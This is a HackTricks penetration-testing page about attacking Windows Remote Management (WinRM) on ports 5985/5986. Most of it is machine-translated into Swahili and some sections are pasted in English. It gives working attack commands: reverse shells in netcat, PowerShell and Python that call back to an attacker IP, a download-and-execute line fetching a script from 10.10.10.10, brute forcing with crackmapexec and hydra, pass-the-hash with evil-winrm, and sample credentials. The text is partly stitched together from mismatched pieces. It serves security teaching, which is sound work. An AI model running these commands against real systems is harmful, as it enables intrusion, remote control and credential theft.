hacktricks/network-services-pentesting/5985-5986-pentesting-winrm.md

5985,5986 - Kupima Usalama wa WinRM

Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

Jiunge na HackenProof Discord ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

Machapisho Kuhusu Kudukua
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za kudukua

Habari za Kudukua za Wakati Halisi
Endelea kuwa na habari za ulimwengu wa kudukua kwa kasi kupitia habari na ufahamu wa wakati halisi

Matangazo ya Hivi Karibuni
Baki na habari kuhusu uzinduzi wa tuzo za mdudu mpya na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

WinRM

Udhibiti wa Mbali wa Windows (WinRM) unasisitizwa kama itifaki ya Microsoft inayowezesha udhibiti wa mbali wa mifumo ya Windows kupitia HTTP(S), ikitegemea SOAP katika mchakato huo. Kimsingi, inatumia WMI, ikijitokeza kama kiolesura kinachotegemea HTTP kwa shughuli za WMI.

Kuwepo kwa WinRM kwenye kompyuta inaruhusu utawala wa mbali wa moja kwa moja kupitia PowerShell, kama vile SSH inavyofanya kazi kwa mifumo mingine ya uendeshaji. Ili kujua ikiwa WinRM inafanya kazi, ni muhimu kuangalia ufunguzi wa bandari maalum:

• 5985/tcp (HTTP)
• 5986/tcp (HTTPS)

Ufunguzi wa bandari kutoka kwenye orodha hapo juu unaonyesha kuwa WinRM imeanzishwa, hivyo kuruhusu jaribio la kuanzisha kikao cha mbali.

Kuanzisha Kikao cha WinRM

Ili kuwezesha PowerShell kwa WinRM, amri ya Microsoft Enable-PSRemoting inatumika, kuwezesha kompyuta kukubali amri za mbali za PowerShell. Kwa ufikiaji wa PowerShell ulioboreshwa, amri zifuatazo zinaweza kutekelezwa ili kuwezesha utendaji huu na kuweka mwenyeji yeyote kuwa waaminifu:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

Njia hii inahusisha kuongeza alama ya nukta nyingi kwenye usanidi wa trustedhosts, hatua ambayo inahitaji kuzingatia kwa uangalifu kutokana na athari zake. Pia imebainishwa kuwa inaweza kuwa muhimu kubadilisha aina ya mtandao kutoka "Umma" hadi "Kazi" kwenye kompyuta ya mshambuliaji.

Zaidi ya hayo, WinRM inaweza kuamilishwa kwa mbali kwa kutumia amri ya wmic, kama inavyoonyeshwa hapa chini:

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

Njia hii inaruhusu usanidi wa mbali wa WinRM, kuongeza uwezo wa kusimamia mashine za Windows kutoka mbali.

Angalia ikiwa imepangwa

Ili kuhakiki usanidi wa mashine yako ya shambulio, amri ya Test-WSMan hutumiwa kuangalia ikiwa lengo limepangwa vizuri na WinRM. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini ni mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililopangwa dhidi ya moja ambayo haijapangwa vizuri:

• Kwa lengo ambalo limepangwa vizuri, matokeo yatafanana na haya:

Test-WSMan <target-ip>

Jibu litakuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kuwa WinRM imefungwa kwa usahihi.

• Kwa upande mwingine, kwa lengo sio limefungwa kwa WinRM, hii itasababisha kukosekana kwa habari za kina kama hizo, ikionyesha kutokuwepo kwa ufungaji sahihi wa WinRM.

Tekeleza amri

Kutekeleza ipconfig kwa mbali kwenye kompyuta ya lengo na kuona matokeo yake, fanya yafuatayo:

Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]

Unaweza pia kutekeleza amri ya konsoli yako ya sasa ya PS kupitia Invoke-Command. Fikiria una kazi inayoitwa enumeration kwenye kompyuta yako na unataka kuitekeleza kwenye kompyuta ya mbali, unaweza kufanya hivi:

Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]

Tekeleza Skripti

To execute a script on a remote Windows machine using WinRM, you can use the Invoke-Command cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote computers.

Here is an example of how to execute a script using WinRM:

Invoke-Command -ComputerName <target_ip> -ScriptBlock { <script_content> }

Replace <target_ip> with the IP address of the remote machine and <script_content> with the actual content of your script.

Make sure that WinRM is enabled on the target machine and that you have the necessary permissions to execute scripts remotely.

Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]

Pata kifaa cha kudhibiti kwa njia ya nyuma

To get a reverse shell, you can use the following methods:

Method 1: Netcat

1. Start a listener on your machine: nc -lvp <port>
2. Execute the following command on the target machine: nc <your_ip> <port> -e /bin/bash

Method 2: PowerShell

1. Start a listener on your machine: nc -lvp <port>
2. Execute the following command on the target machine: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<your_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Method 3: Python

1. Start a listener on your machine: nc -lvp <port>
2. Execute the following command on the target machine: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_ip>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Remember to replace <port> with the desired port number and <your_ip> with your machine's IP address.

Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}

Pata kikao cha PS

Ili kupata kikao cha PowerShell kinachoweza kuingiliana, tumia Enter-PSSession:

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)

Kikao kitakimbia katika mchakato mpya (wsmprovhost) ndani ya "mwathirika"

Kulazimisha Kufunguliwa kwa WinRM

Ili kutumia PS Remoting na WinRM lakini kompyuta haijasanidiwa, unaweza kuwezesha kwa:

.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"

Kuokoa na Kurudisha vikao

Hii haitafanya kazi ikiwa lugha imezuiliwa kwenye kompyuta ya mbali.

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1

Ndani ya kikao hiki unaweza kupakia skripti za PS kwa kutumia Invoke-Command

Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1

Makosa

Ikiwa unapata kosa lifuatalo:

enter-pssession : Kukamilisha uunganisho kwa seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa kosa lifuatalo: Mteja wa WinRM hauwezi kusindika ombi. Ikiwa mfumo wa uwakilishi ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijasajiliwa kwenye kikoa, basi usafirishaji wa HTTPS unapaswa kutumika au mashine ya marudio inapaswa kuongezwa kwenye mipangilio ya usanidi wa TrustedHosts. Tumia winrm.cmd kuweka mipangilio ya TrustedHosts. Kumbuka kuwa kompyuta kwenye orodha ya TrustedHosts huenda zisiwe na uwakilishi. Unaweza kupata habari zaidi kuhusu hilo kwa kukimbia amri ifuatayo: winrm help config. Kwa habari zaidi, angalia mada ya Msaada kuhusu Kutatua Matatizo ya Mbali.

Jaribu kwenye mteja (taarifa kutoka hapa):

winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'

Jiunge na seva ya HackenProof Discord ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa bug bounty!

Machapisho ya Udukuzi
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi

Habari za Udukuzi za Waktu Halisi
Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi

Matangazo ya Hivi Karibuni
Baki na habari kuhusu bug bounties mpya zinazozinduliwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Uhusiano wa WinRM kwenye linux

Brute Force

Kuwa makini, kujaribu kuvunja nguvu winrm kunaweza kuzuia watumiaji.

#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm

Kutumia evil-winrm

Evil-winrm ni chombo cha nguvu kinachotumiwa katika uchunguzi wa usalama wa mtandao kwa kuingia kwa nguvu kwenye huduma ya WinRM. Inatoa njia rahisi ya kudhibiti na kuchunguza mifumo ya Windows kwa njia ya mbali.

Kuanza, unahitaji kujua anwani ya IP ya mfumo wa lengo na kuwa na ufikiaji wa mtandao kwa mfumo huo. Kisha, unaweza kutumia amri ifuatayo kuanzisha kikao cha WinRM:

evil-winrm -i <ip_address> -u <username> -p <password>

Badala ya kuingiza nenosiri moja kwa moja kwenye amri, unaweza pia kutumia faili ya nenosiri kwa njia ifuatayo:

evil-winrm -i <ip_address> -u <username> -P <password_file>

Baada ya kuanzisha kikao, unaweza kutumia amri za evil-winrm kufanya shughuli mbalimbali kwenye mfumo wa lengo. Kwa mfano, unaweza kuangalia habari ya mfumo kwa kutumia amri ifuatayo:

shell
sysinfo

Pia, unaweza kutekeleza amri za PowerShell kwa kutumia amri ifuatayo:

shell
powershell

Evil-winrm inatoa njia rahisi ya kuingia kwa nguvu kwenye huduma ya WinRM na kuchunguza mifumo ya Windows kwa njia ya mbali. Ni chombo muhimu katika uchunguzi wa usalama wa mtandao.

gem install evil-winrm

Soma nyaraka kwenye github yake: https://github.com/Hackplayers/evil-winrm

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

Kutumia evil-winrm kuunganisha kwenye anwani ya IPv6, tengeneza kuingiza ndani ya /etc/hosts kuweka jina la kikoa kwa anwani ya IPv6 na uunganishe kwenye kikoa hicho.

Pita hash na evil-winrm

evil-winrm -u <username> -H <Hash> -i <IP>

Kutumia kifaa cha PS-docker

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds

Kutumia skripti ya ruby

Msimbo umetolewa hapa: https://alamot.github.io/winrm_shell/

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/


conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)


class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end


command=""
file_manager = WinRM::FS::FileManager.new(conn)


conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end

Shodan

• port:5985 Microsoft-HTTPAPI

Marejeo

• https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/

Amri za Kiotomatiki za HackTricks

Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p ‘MySuperSecr3tPass123!’

https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`

#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}

Jiunge na seva ya HackenProof Discord ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!

Machapisho ya Udukuzi
Shiriki na yaliyomo yanayochunguza msisimko na changamoto za udukuzi

Habari za Udukuzi za Waktu Halisi
Endelea kuwa na habari za ulimwengu wa udukuzi kwa kutumia habari na ufahamu wa wakati halisi

Matangazo ya Hivi Karibuni
Baki na habari kuhusu tuzo za mdudu zinazoanzishwa na sasisho muhimu za jukwaa

Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!

Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
• Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.